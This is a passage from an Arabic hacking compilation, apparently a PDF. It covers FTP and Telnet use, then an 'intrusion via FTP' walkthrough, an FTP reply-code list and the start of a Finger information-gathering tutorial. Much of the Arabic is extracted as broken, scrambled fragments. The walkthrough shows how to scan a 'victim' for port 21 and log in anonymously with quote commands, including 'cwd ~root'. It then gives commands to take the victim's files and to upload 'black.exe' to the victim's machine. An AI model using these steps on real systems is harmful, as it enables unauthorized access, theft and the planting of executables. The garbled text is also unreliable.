‫ﻗﻢ‬ ‫ﺛﻢ ﻧﺪ ﺧ ﻞاﻻﺳﻢ ﻮﻫﻮ ﻋ ﻞ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل ‪"IronPrivate"،‬ﺛﻢ ﻧﻘﻮمﺑﺎد ﺧﺎ لاﻟ ﺮ‬ ‫‪ftp ftp.tripod.com‬‬
‫ﺘﺎدة‪.‬‬ ‫ﺘﺨﺪام ﻧﻔ ﺲأواﻣ ﺮ ‪ Unix‬ﺎﻟﻤﻌ‬
‫ً "******"‪ .‬ﻮﺑﻌﺪاﻟﺪ ﺧﻮ لاﻟﻰاﻟ ﺤﺴﺎب ﯾﻤﻜﻨﻚاﺳ‬ ‫اﻟﺴ ﺮي وﻫﻮ ﻣﺜﻼ‬
‫ـ‪Unix‬‬ ‫ﻮإذاأرد ت ﺎﻟﻤﺰﯾﺪ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ ﻧﻈﺎماﻟ‬

‫‪٢٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊ‪:‬‬ ‫ﻋﻠﯿﻚاﻟﺪ ﺧﻮو لاﻟﻰ ﻫﺬااﻟﻤﻮ‬


‫‪http://www.pc-worlds.net/lunexx.html‬‬
‫ﺘﺪﺋﯿﻦﻓﻰ ﻫﺬااﻟﻨﻈﺎم ‪.‬‬ ‫ﻓﻬﻮ ﯾﻔﯿﺪاﻟﻤﺒ‬
‫ﺘﺼﻔﺢ‪Browser:‬‬ ‫ﺘﺨﺪاماﻟﻤ‬ ‫ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﺎﺳ‬
‫ﻗﻊ ‪ URL‬ﻮﯾﺒﺪأاﻟﻌﻨﻮان‬ ‫ًﻓﻤﺎ ﻋﻠﯿﻚ ﺳﻮىاد ﺧﺎ ل ﻋﻨﻮاناﻟﻤﻮ‬ ‫ﺘﺼﻔ ﺤﺎ ت ﺳﻬ ﻞ ﺟﺪا‬ ‫ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻤ‬
‫ﺘﺄﺗﻲ‬‫ـ ‪ FTP‬ﺳ‬ ‫ﻗﻊاﻟ‬ ‫ً ﻣﻦﻛﻠﻤﺔ ‪//:http‬ﻟﻠﻌﻨﺎوﯾﻦاﻟﻌﺎدﯾﺔ‪،‬ﺑﻌﺪاﻟﺪ ﺧﻮ لاﻟﻰ ﻣﻮ‬ ‫ﺑﻜﻠﻤﺔ ‪//:ftp‬ﺛﻢاﻟﻌﻨﻮانﺑﺪﻻ‬
‫اﻟﺼﻔ ﺤﺔ ﻋﺒﺎرة ﻋﻦ ﻣﻠﻔﺎ ت وﻣﺠﻠﺪا ت وﻣﺎﻋﻠﯿﻚ ﺳﻮىاﻟﻨﻘ ﺮ ﻋﻠﻰاﻟﻤﻠ ﻒ ﺎﻟﻤﻄﻠﻮب ﻻﻧﺰاﻟﻪ‪.‬‬
‫ﺘﺨﺪام ﺣﺴﺎب‪SLIP/PPP:‬‬ ‫ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﺎﺳ‬
‫ﺘﺨﺪامﺑ ﺮاﻣ ﺞﺗﺎﺑﻌﺔ ‪Client Programs.‬‬ ‫ﺘﺨﺪاﻣﺎ تﻫﺬااﻟﻨﻮ ع ﻣﻦاﻟ ﺮﺑﻂأﻧﻬﺎﺗﺴﻤﺢﻟﻨﺎﺑﺎﺳ‬ ‫ﺄﻓ ﻀ ﻞاﺳ‬
‫ﺘﺨﺪاﻣﻪﻟﻠﻨﻮاﻓﺬ ‪Windows‬ﻫﻮﺑ ﺮﻧﺎﻣ ﺞ‪Ws_ftp.‬‬ ‫ﻮأﻓ ﻀ ﻞﺑ ﺮﻧﺎﻣ ﺞﺗﺎﺑﻊ ﯾﻤﻜﻦاﺳ‬
‫ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞ ‪Ws_ftp LE 5.06:‬‬ ‫ﺎﺳ‬
‫اد ﺧ ﻞ ﻋﻠﻰاﻟﺒ ﺮﻧﺎﻣ ﺞ وذﻟﻚﺑﺎﻟﻨﻘ ﺮاﻟﻤﺰدوج ﻋﻠﻰأﯾﻘﻮﻧﺔاﻟﺒ ﺮﻧﺎﻣ ﺞ‪ ،‬ﺳﯿﻈﻬ ﺮﻟﻚ ﻣ ﺮﺑﻊ ﺣﻮار ‪Session‬‬
‫؛‬‫ﺘﺐﻓﻲ ﺧﺎﻧﺔ ‪ Profile Name‬ﺎﺳﻢ ﺣﺴﺎباﻟﺪ ﺧﻮ ل‬ ‫ﺘﺴﺠﯿ ﻞاﻟﺪ ﺧﻮ ل‪،‬اﻛ‬‫‪Profile‬ﻮاﻟﺬي ﻣﻦ ﺧﻼﻟﻪﺗﻘﻮمﺑ‬
‫ﺘﺐﻓﻲ ﺧﺎﻧﺔ ‪ Host Name‬ﺎﺳﻢاﻟﻤﻠﻘﻦ وﻓﻲ‬ ‫ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل ‪ My Home Page In Tripod‬ﻮاﻛ‬
‫ﻗﯿ ﻖ‬‫ﺘﺪ‬‫ﺘ ﺮ ‪Auto Detect‬ﻟﻜﻲ ﯾﻘﻮمﺑﺎﻟ‬ ‫ﻫﺬااﻟﻤﺜﺎ ل ﻫﻮ ‪ftp.tripod.com‬ﺛﻢﻓﻲ ﺧﺎﻧﺔ ‪ Host Type‬ﺎ ﺧ‬
‫ﺘﺎﺑﺔاﻻﺳﻢﻓﻲ ﺧﺎﻧﺔ ‪ User ID‬ﻮﻫﻮ ﻣﺜﻼ‬
‫ً‬ ‫ﺘﻠﻘﺎﺋﻲﻓﻲ ﻧﻮ ع ﻧﻈﺎماﻟﺠﻬﺎزاﻟﻤ ﻀﯿ ﻒ‪،‬ﺑﻌﺪ ذﻟﻚﻗﻢﺑﻜ‬ ‫اﻟ‬
‫ً ﻋﻠﻰﻫﯿﺌﺔ ﻧﺠﻮم ******‪،‬ﺛﻢ‬ ‫ﻗﻢاﻟﺴ ﺮيﻓﻲ ﺧﺎﻧﺔ ‪ Password‬ﻮﺳﯿﻈﻬ ﺮ ﻣﺨﻔﯿﺎ‬ ‫ﺛﻢاﻟ ﺮ‬‫‪IronPrivate‬‬
‫ﺘﺎﻟﻲ‪:‬‬ ‫ا ﺿﻐﻂ ‪OK.‬ﻛﻤﺎﻓﻲاﻟﺸﻜ ﻞ ﺎﻟ‬

‫؛اﻟﻘﺴﻢاﻷﯾﺴ ﺮ‬‫ﺘﻨﻘﺴﻢ ﻧﺎﻓﺬةاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻰﻗﺴﻤﯿﻦ‬‫ﺑﻌﺪ ذﻟﻚ ﺳﯿﻘﻮماﻟﺒ ﺮﻧﺎﻣ ﺞﺑﺎﻟﺪ ﺧﻮ لاﻟﻰاﻟ ﺤﺴﺎباﻟﻤﻄﻠﻮب ﻮﺳ‬
‫ﺘﻄﯿﻊ ﺟﻠﺐأو‬‫ﻫﻮ ﺟﻬﺎزاﻟﻜﻤﺒﯿﻮﺗ ﺮﻟﺪﯾﻚ واﻟﻘﺴﻢ ﺎﻷﯾﻤﻦﻫﻮ ﺟﻬﺎزاﻟﻜﻤﺒﯿﻮﺗ ﺮاﻟﻤ ﻀﯿ ﻒ‪،‬ﻓﻲﻫﺬهاﻟﻤ ﺮ ﺣﻠﺔﺗﺴ‬
‫ﺘ ﺮﻧ ﺖﺄو‬
‫ﺘﻮﯾﺎ ت ﺣﺴﺎﺑﻚ ﻋﻠﻰاﻻﻧ‬‫ﺘ ﺤﻜﻢﻓﻲ ﻣ ﺤ‬‫ﺘﻄﯿﻊاﻟ‬
‫ارﺳﺎ لاﻟﻤﻠﻔﺎ تأوﺗﻐﯿﯿ ﺮاﺳﻤﺎﺋﻬﺎأو ﺣﺬﻓﻬﺎ ‪...‬اﻟ ﺦ‪.‬أيﺗﺴ‬
‫ﻋﻠﻰ ﺟﻬﺎزكﺑﺴﻬﻮﻟﺔﻓﺎﺋﻘﺔ‪.‬‬

‫ﺘﺨﺪاماﻻﺗﺼﺎ لاﻟﺸﺒﻜﻲاﻟﺒﻌﯿﺪ ‪Telnet:‬‬


‫ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﺎﺳ‬

‫ﺘﺨﺪمﺑ ﺮﺑﻂ ﺟﻬﺎزه ﻋﻠﻰ‬


‫ﺘ ﺮﻧ ﺖ ﻣﻌﯿﺎريﻟﺨﺪﻣﺎ تاﻟ ﺮﺑﻂ ﻋﻦﺑﻌﺪ وﯾﺴﻤﺢﻟﻠﻤﺴ‬
‫‪Telnet‬ﻫﻲﺑ ﺮوﺗﻮﻛﻮ لاﻧ‬

‫‪٢٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻠ ﻒاﻟﻌ ﺮ ض ﺣﺴﺐ ﻧﻈﺎماﻟﻜﻤﺒﯿﻮﺗ ﺮ‬‫ً ﺟﻬﺎزه وﻛﺄﻧﻪ ﺟﺰ ء ﻣﻦ ذﻟﻚاﻟﻜﻤﺒﯿﻮﺗ ﺮ ﺎﻟﺒﻌﯿﺪ‪ .‬وﯾﺨ‬
‫ﻛﻤﺒﯿﻮﺗ ﺮ ﻣ ﻀﯿ ﻒ ﺟﺎﻋﻼ‬
‫ﺘﺨﺪم ﻧﻈﺎم آ ﺧ ﺮﻓﯿﺠﺐ‬‫ﺘﺨﺪم ﻧﻈﺎم ‪Windows‬ﻓﻼ ﻣﺸﻜﻠﺔأﻣﺎاذاﻛﺎن ﯾﺴ‬ ‫اﻟﻤ ﻀﯿ ﻒ‪.‬اذاﻛﺎناﻟﺠﻬﺎزاﻟﺒﻌﯿﺪ ﯾﺴ‬
‫ﺘ ﺤﻜﻢ ﻮأﻫﻢأﻣ ﺮ ﯾﺠﺐأنﺗﻌ ﺮﻓﻪﻫﻮ "؟" واﻟﺬي ﯾ ﺤ ﻀ ﺮﻟﻚﻗﺎﺋﻤﺔﺑﺎﻷواﻣ ﺮاﻟﻼزﻣﺔ‪.‬‬ ‫ﻣﻌ ﺮﻓﺔﺑﻌ ﺾاﻷواﻣ ﺮﻟﻠ‬

‫ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞ ‪ Telnet‬ﻣﻦ ‪Windows:‬‬


‫‪-‬ﺎﺳ‬

‫ً ﯾﺴﻤﻰ ‪ Telnet‬ﯾﻤﻜﻨﻚاﻟﺪ ﺧﻮ ل ﻋﻠﯿﻪﺑﺎﻟ ﻀﻐﻂ ﻋﻠﻰﻗﺎﺋﻤﺔاﺑﺪأ ‪Start‬ﺛﻢ‬ ‫ً ﺳﻬﻼ‬‫ﺗ ﺮﻓ ﻖ ‪Windows‬ﺑ ﺮﻧﺎﻣﺠﺎ‬


‫ﺘ ﺮ ‪Remote‬‬ ‫ﺘﺢﻟﻚ ﺻﻔ ﺤﺔاﻟﺒﺪ ءﻟﻠﺒ ﺮﻧﺎﻣ ﺞ‪ ..‬ﻣﻦ ‪ Connect‬ﺎ ﺧ‬ ‫ﺘﻨﻔ‬
‫ﺘﺐ ‪ Telnet‬ﻮﺳ‬ ‫ﺗﺸﻐﯿ ﻞ ‪Run‬ﺛﻢاﻛ‬
‫ﺘﺐﻓﻲ ﺧﺎﻧﺔ ‪ Host Name‬ﺎﺳﻢ ﻣﻠﻘﻦ‬ ‫‪System.‬ﻓﻲ ﺻﻨﺪو قاﻟ ﺤﻮار ‪ Connect‬ﺎﻟﺬي ﺳﯿﻈﻬ ﺮﻟﻚاﻛ‬
‫ـ‬
‫ﺘ ﺮ ﻣﻦاﻟ‬‫ﺘﺐﻓﻲ ﺧﺎﻧﺔ ‪ Port‬ﺎﻟﻤﯿﻨﺎ ءأواﻟﻤﻨﻔﺬ )اذاﻛﺎنﻟﺪﯾﻚ(اواﺗ ﺮﻛﻪﻛﻤﺎﻫﻮ‪،‬ﺛﻢا ﺧ‬ ‫اﻟﺠﻬﺎزاﻟﻤ ﻀﯿ ﻒﺛﻢاﻛ‬
‫ﺘﺎج‬ ‫ﺘﺤ‬‫ﺘﻢاﻟ ﺮﺑﻂﻓﺴ‬ ‫ﺘﺠ ﺮﺑﺔ‪.‬ﺑﻌﺪ ذﻟﻚا ﺿﻐﻂ ‪ Connect‬ﻮﻋﻨﺪﻣﺎ ﯾ‬ ‫‪Term Type ،‬ﺎنﻛﺎنﻟﺪﯾﻚ واﻻﻗﻢﺑﺎﻟ‬
‫ﺘ ﺮ ‪Disconnect‬ﻣﻦﻗﺎﺋﻤﺔ ‪ Connect‬ﻮﺑﻌﺪ ذﻟﻚ‬ ‫ﺘﻬﺎ ء ﻣﻦاﻟﻨﻘ ﻞا ﺧ‬‫ﻗﻢاﻟﺴ ﺮي‪ .‬وﺑﻌﺪاﻻﻧ‬ ‫ﻻد ﺧﺎ لاﻻﺳﻢ واﻟ ﺮ‬
‫ﺘ ﺮ ‪… Exit‬‬ ‫اﺧ‬

‫‪٢٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"‬ ‫" اﻹﺧﱰاق ﻋﻦ ﻃﺮﯾﻖ‪FTP‬‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪hacker dz :‬‬
‫‪$$$$$$$$$$$$$$‬‬

‫ﺘ ﺤﺎم ﯾﺠﺐان ﯾﻜﻮنﻟﺪى‬ ‫ﻗ‬‫ﺘ ﺤﺎم ﻋﺒ ﺮاﻻ فﺗﻲﺑﻲ ‪ FTP‬أوﻻ وﻟﻨﺠﺎ حاﻹ‬ ‫ﻗ‬‫ﺘﻨﺎو ل ﻃ ﺮﯾﻘﺔإ‬‫اﻟﯿﻮم ﺳﻮ ف ﻧ‬
‫ﺘﻮ ح ﻋﻠﯿﻚان‬ ‫ﺘﺄﻛﺪ ﻣﻦأناﻟﺒﻮر ت ﻣﻔ‬‫ﺘﻮ ح و ﻫﻮاﻟﺒﻮر تاﻟﺨﺎ ص با ل ‪ FTP‬وﻟ‬ ‫اﻟ ﻀ ﺤﯿﺔاﻟﺒﻮر ت ‪ ٢١‬ﻣﻔ‬
‫ﺘﻘ ﻞ‬
‫ﺘﻮ ح ﻧﻨ‬
‫ﺘﺄﻛﺪاناﻟﺒﻮر ت ﻣﻔ‬
‫ﺘﻌﻤ ﻞﺑ ﺮاﻣ ﺞاﻟﺴﻜﺎن وﻫﻲﻛﺜﯿ ﺮة و ﻣﻦاﻫﻤﻬﺎ ‪ Superscanne‬ﺑﻌﺪﻣﺎﺗ‬ ‫ﺗﺴ‬
‫اﻟﻰاﻟﺨﻄﻮةاﻟﺜﺎﻧﯿﺔ و ﻫﻲ ‪:‬‬
‫إ ﺿﻐﻂ ﻋﻠﻰ‬
‫‪Start‬‬
‫ﺛﻢ‬
‫‪Run‬‬
‫ﺘﺐ‬‫ﺛﻢاﻛ‬
‫‪ftp – n‬‬
‫ﺘﻮب ﻋﻠﯿﻬﺎ‬‫ﺳﻮ فﺗﻄﻠﻊﻟﻚ ﻧﺎﻓﺪةﻓﻲاﻟﺪوس ﻣﻜ‬
‫‪<FTP‬‬
‫ؤوﻛﻲﻟ ﺤﺪﻫﻨﺎﻛ ﻞ ﺷﻲ ءﺗﻤﺎم‬
‫ﺘﺐ‬ ‫وﺑﻌﺪﯾﻦاﻛ‬
‫‪Open‬‬
‫ﺛﻢإ ﺿﻐﻂ ﻋﻠﻰ‬
‫إد ﺧﺎ ل‬
‫‪Enter‬‬
‫ﺘﺎﻟﯿﺔ‬‫ﺘﯿﺠﺔاﻟ‬ ‫ﺘ ﺤﺼ ﻞ ﻋﻠﻰاﻟﻨ‬ ‫ﺳﻮ فﺗ‬
‫>‪FTP‬‬
‫‪To‬‬
‫ﺘﺐﺑﺠﺎﻧﺐ‬ ‫أﻛ‬
‫‪To‬‬
‫ﻗﻢاﻹﺑﻲﻟﻠ ﻀ ﺤﯿﺔﺛﻢإ ﺿﻐﻂ ﻋﻠﻰإد ﺧﺎ ل واﻵن ﺧﺪﺑﺎﻟﻚ ﻣﻌﻲ‬ ‫ر‬
‫إداﺗ ﺤﺼﻠ ﺖ ﻋﻠﻰ ﻫﺪااﻟ ﺮدﻓﻘﺪﺗﺨﻄﯿ ﺖ ﺧﻄﻮة‬
‫‪Connected to www.assassin.com‬‬
‫‪.(websrv1 Microsoft FTP Service (Version 4.0 ٢٢٠‬‬
‫ﺘﺎﻟﯿﺔ ‪ftp>quote user ftp‬‬ ‫ﺘﺎﺑﺔاﻟ‬‫ﺘﺐاﻟﻜ‬ ‫واﻵنأﻛ‬
‫إداﺗ ﺤﺼﻠ ﺖ ﻋﻠﻰ ﻫﺪااﻟ ﺮدﻓﻘﺪﺗﺨﻄﯿ ﺖ ﺧﻄﻮة‬
‫‪Anonymous acces allowed, send identify (e-mail name) as ٣٣١‬‬
‫‪password.‬‬
‫ﺘﺎﻟﯿﺔ‬
‫ﺘﺎﺑﺔاﻟ‬‫ﺘﺐاﻟﻜ‬ ‫ﻮاﻵنأﻛ‬
‫‪ftp>quote cwd ~root‬‬
‫ﺈداﺗ ﺤﺼﻠ ﺖ ﻋﻠﻰ ﻫﺪااﻟ ﺮدﻓﻘﺪﺗﺨﻄﯿ ﺖ ﺧﻄﻮة‬
‫‪530 Please login with USER and PASS‬‬
‫ﺘﺎﻟﯿﺔ‬
‫ﺘﺎﺑﺔاﻟ‬‫ﺘﺐاﻟﻜ‬ ‫ﺛﻢأﻛ‬

‫‪٢٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪ftp>quote pass ftp‬‬


‫ﺈداﺗ ﺤﺼﻠ ﺖ ﻋﻠﻰ ﻫﺪااﻟ ﺮدﻓﻘﺪﺗﺨﻄﯿ ﺖ ﺧﻄﻮة‬
‫ﺘ ﺤﺎم‬
‫ﻗ‬‫ﻮ ﻧﺠ ﺤ ﺖﻓﻲاﻹ‬

‫‪230 Anonymous user logged in.‬‬


‫ﻣﺒ ﺮوكأﻧ ﺖاﻵنﻓﻲ ﺟﻬﺎزاﻟ ﻀ ﺤﯿﺔ‬
‫ﺘﻌﻤﺎ ل‬‫ﻣﺎ ﻋﻠﯿﻚاﻵناﻻانﺗﻘﻮمﺑﺈﺳ‬
‫ﺎواﻣ ﺮاﻻ فﺗﻲﺑﻲ‪::‬‬
‫ﺘ ﺤﺎم ﻣﻦ دون ﻣﺎ‬‫ﻗ‬
‫ﻗﻌ ﺖﻓﯿﻬﺎ وﻫﻲ ﻧﺠﺎ حاﻹ‬ ‫و ﻃﺒﻌﺎﻟﻦاﻣ ﺮ ﻋﻠﯿﻬﺎ ﻣ ﺮوراﻟﻜ ﺮامﻟﻜﻲ ﻻﺗﻘﻌﻮﻓﻲاﻟﻤﺸﻜﻠﺔاﻟﻲ و‬
‫ﻗﯿﻘﺔ واﻧﺎ ﻣﺠﻤﺪاﻹﯾﺪي و‬‫ﺘﯿﺒﻲ وإدااردﺗﻢانﺗ ﻀ ﺤﻜﻮﺑﻘﺎﻟﯿﺄﻛﺜ ﺮ ﻣﻦ ‪ ٢٠‬د‬ ‫أﻋ ﺮ ف و ﻻﻓﻜ ﺮة ﻋﻠﻰاواﻣ ﺮاﻟﻔ‬
‫اﻟ ﻀ ﺤﯿﺔ ﻋﺎﻟﻘﺔ ﻣﻦ دونأنأﻋﻤ ﻞأي ﺷﻲ ء وﻟﻬﺪا‬
‫ﺘ ﺤﺎم‬
‫ﻗ‬‫ﻗﻤ ﺖﺑ ﺤ ﻀﯿ ﺮاﻟىﻮاﻣ ﺮﻟﻜﻲﺗﻄﺒﻘﻮﻫﺎ ﻣﺒﺎﺷ ﺮةاﺑﻌﺪ ﻧﺠﺎ حاﻹ‬
‫‪Pwd‬‬
‫ﺘﻮﯾﻪاﻟﻬﺎرد دﯾﺴﻚ‬ ‫ﻟﻜﻲﺗﻌ ﺮ ﻣﺎ ﯾ ﺤ‬
‫‪Cd‬‬
‫ﺘ ﺤﺎم ﻣﺠﻠﺪ ﻣﺜﺎ ل‬ ‫ﻗ‬‫ﻹ‬
‫‪Cd black‬‬
‫ﺘ ﺤﺎم ﻣﺠﻠﺪاﻟﻤﺴﻤﻰﺑﻼك‬ ‫ﻗ‬
‫ﻓﻲ ﻫﺪااﻟﻤﺜﺎ لﻗﻤ ﺖﺑﺈ‬
‫‪Ls‬‬
‫ﺘﻮىاﻟﻤﺠﻠﺪأواﻟﻬﺎرد دﯾﺴﻚ‬ ‫ﺘ ﻀﺢﻟﻚ ﻣ ﺤ‬ ‫ﻟﻜﻲ ﯾ‬
‫‪Get‬‬
‫ﺘﺎ ع ﺟﻬﺎزك ﻣﻦ ﺟﻬﺎزاﻟ ﻀ ﺤﯿﺔ‬ ‫ﺘﺐﺑ‬ ‫ﻟﻜﻲﺗ ﺤﻤ ﻞاﻟﻰ ﺳﻄﺢاﻟﻤﻜ‬
‫ﻣﺜﺎ ل‬
‫‪Get black.exe‬‬
‫‪Put‬‬
‫اﻟﻌﻤﻠﯿﺔاﻟﻌﻜﺴﯿﺔ ل‬
‫‪Get‬‬
‫ﺘﺎ ع ﺟﻬﺎزك وﺗ ﻀﻌﻪﻓﻲ ﺟﻬﺎزاﻟ ﻀ ﺤﯿﺔ‬ ‫ﺘﺐﺑ‬ ‫ﯾﻌﻨﻲانﺗﺄ ﺧﺪ ﻣﻠ ﻒ ﻣﻦ ﺳﻄﺢاﻟﻤﻜ‬
‫ﻣﺜﺎ ل‬
‫‪Put black.exe‬‬
‫‪Clos‬‬
‫ﻟﻘﻄﻊاﻹﺗﺼﺎ ل ﻣﻊاﻟ ﻀ ﺤﯿﺔ‬
‫ﺛﻨﺎ ءﺗﻄﺒﯿ ﻖ‬
‫ﺘ ﺤﺼ ﻞ ﻋﻠﯿﻬﺎ ﻣﻦ ﺟﻬﺎزاﻟ ﻀ ﺤﯿﺔأ‬‫ﻫﺪيأﻫﻢاﻷواﻣ ﺮ واﻵن ﺳﻮنﺗﻄ ﺮ ق ﻋﻠﻰأﻧﻮا عاﻟ ﺮﺳﺎﺋ ﻞاﻟﻲ ﻧ‬
‫ﻗﺎﻣﻬﺎ‬‫اﻷوام و ﺷ ﺮ ﺣﻬﺎ وار‬
‫‪Codes:‬‬ ‫‪Signification:‬‬
‫‪Restart marker reply.‬‬ ‫‪١١٠‬‬
‫)‪Service ready in nnn minutes. (nnn est un temps‬‬ ‫‪١٢٠‬‬
‫‪Data connection already open; transfer starting.‬‬ ‫‪١٢٥‬‬
‫‪150‬‬ ‫‪File status okay; about to open data connection.‬‬
‫‪200‬‬ ‫‪Command okay.‬‬
‫‪202‬‬ ‫‪Command not implemented, superfluous at this site.‬‬
‫‪211‬‬ ‫‪System status, or system help reply.‬‬

‫‪٢٧‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

212 Directory status.


213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre
chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour
exécuter l'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d'accès
possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)

..........

٢٨
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬
‫" ﺑﺮوﺗﻮﻛﻮل ﺧﺪﻣﺔ ‪"Finger‬‬

‫‪$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪LAMeR:‬‬
‫‪$$$$$$$$$$$$‬‬
‫ﻗﻊاواﻟﺴﯿ ﺮﻓ ﺮ‬
‫ﺘﺨﺪﻣﻲاﻟﻤﻮ‬
‫ﺷ ﺮ ح ﻻ ﺣﺪاﻟﺒ ﺮوﺗﻮﻛﻮﻻ تاﻟﻤﻬﻤﺔﻓﻲ ﺟﻤﻊاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ ﻣﺴ‬

‫ﻗﺒ ﻞ اﻟﺒﺪ ءﺑﻬﺬااﻟﻤﻮ ﺿﻮ عﻓﻬﺬااﻟﺒﺮﺗﻮﻛﻮ ل ﯾﻌﻤ ﻞ ﻋﻠﻰاﻟﺒﻮر ت ‪79‬‬


‫ﻟﻠﻤﻌﻠﻮﻣﯿﺔ و‬

‫‪1.1‬ﻣﻘﺪﻣﺔ ﻋﻦ‪Finger‬‬
‫ﺘﺨﺪام‪Finger‬‬ ‫‪1.2‬ﺎﺳ‬
‫ﺘﺨﺪام ﺧﺪﻣﺔ‪Finger‬‬‫‪1.3‬ﺑﻌ ﺾاﻟﺨﺪ ع ﻋﻨﺪاﺳ‬
‫ﺘﺨﺪام‪Finger‬‬
‫ﻗﻊﺑﺄﺳ‬ ‫ﺘﻌﻼم ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ‬‫‪1.4‬ﺎﻷﺳ‬
‫ﺘﺎج ﻣﻦ ﻫﺬااﻟﺪرس‬ ‫ﺘﻨ‬‫‪1.5‬ﺎﻷﺳ‬
‫ﺘﺎم‬‫‪1.6‬ﺎﻟﺨ‬
‫^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^‬

‫‪1.2‬ﻣﻘﺪﻣﺔ ﻋﻦ‪Finger‬‬
‫>===================<‬
‫ّ ‪ Finger‬ﺪﯾﻤﻮن ﺧﺪﻣﺔﺗﻌﻤ ﻞ ﻋﻦ ﻃ ﺮﯾ ﻖ ﺎﻟﺒﻮر ت ‪ ٧٩‬ﻋﺎدة وﻛﺎﻧ ﺖ‬ ‫ﺈن‬
‫ﻗﻤﻲﻟﻠﻨﺎس‪.‬‬ ‫ﺘﺨﺪﻣﺔأﺻﻼﻛﻨﻮ ع ‪ businesscard‬ﺮ‬ ‫ﻣﺴ‬
‫ﺘﺨﺪم ﺎﻟﺒﻌﯿﺪ ) ‪(remote user‬ﯾﻤﻜﻦأن ﯾ ﺮﺳ ﻞ ﻃﻠﺐإﻟﻰ ‪ Finger‬ﺪﯾﻤﻮن ﯾﺠ ﺮي ﻋﻠﻰ ﻧﻈﺎم ﻣﻌﯿﻦ )‬ ‫ﺎﻟﻤﺴ‬
‫ﺑﻮر ت ‪ Finger‬ﻧﻮﻋﯿﺔ ‪ (٧٩‬وﺳﯿ ﺤﺼ ﻞ ﻋﻠﻰإﺟﺎﺑﺔ‪.‬‬
‫ﺘﺨﺪﻣﯿﻦ‬ ‫ﺘﺨﺪﻣﯿﻦ ﻋﻠﻰ ﻫﺬااﻟﻨﻈﺎم وأﯾ ﻀﺎﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ ﻫﺆﻻ ءاﻟﻤﺴ‬ ‫ﺘﺨﺒ ﺮك ﻣﻦﻫﻢ ﺎﻟﻤﺴ‬ ‫ﻫﺬهاﻹﺟﺎﺑﺔ ﺳ‬
‫ﺘﺼﻠﯿﻦﺑﺎﻟﻨﻈﺎم‪.‬‬ ‫اﻟﻤ‬
‫ﺈ ﺿﺎﻓﺔإﻟﻰﻫﺬهاﻟﻤﻌﻠﻮﻣﺎ ت‪،‬ﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎناﻹﺟﺎﺑﺔﺗﺨﺒ ﺮكأﯾ ﻀﺎ ﻣﻦ ﺎﻟﺬي ﯾﺪﯾ ﺮاﻟﻨﻈﺎم )‪(admin‬ﻮﻛﯿ ﻒ‬
‫ﻗﺎمﺑﺎﻹﺗﺼﺎ ل‪.‬‬
‫ـ‬
‫ﺘﻌﻼم ﻋﻦ ﻫﺬهاﻷﻧﻈﻤﺔ واﻟ‬ ‫ﺘﺨﺪماﻟﻨﺎساﻷﺗﺼﺎ ل ﻋﻠﻰ ﺟﻤﯿﻊاﻧﻮا عاﻷﻧﻈﻤﺔﻓﻲاﻟﻌﺎﻟﻢ و ﻃﻠﺐاﻷﺳ‬ ‫ﻗﺪﯾﻤﺎاﺳ‬
‫‪Finger‬ﻛﺎن ﯾﻌﻄﯿﻬﻢ ﻣﻌﻠﻮﻣﺎ ت ﻋﻦ ﺎﻟﻤﻮﺟﻮدﯾﻦﻓﻲاﻟﻨﻈﺎم وﻫ ﻞﻟﻬﻢ ﺣﺴﺎﺑﺎ تﻓﻲﻫﺬا ﺎﻟﻨﻈﺎم‪.‬وﻛﺎن ‪Finger‬‬
‫ﺘﺨﺪمﻗﺪﯾﻤﺎﻓﻲاﻟﺠﺎﻣﻌﺎ ت واﻟﺸ ﺮﻛﺎ تاﻟﻜﺒﯿ ﺮةأﯾ ﻀﺎ‪.‬‬ ‫ﯾﺴ‬
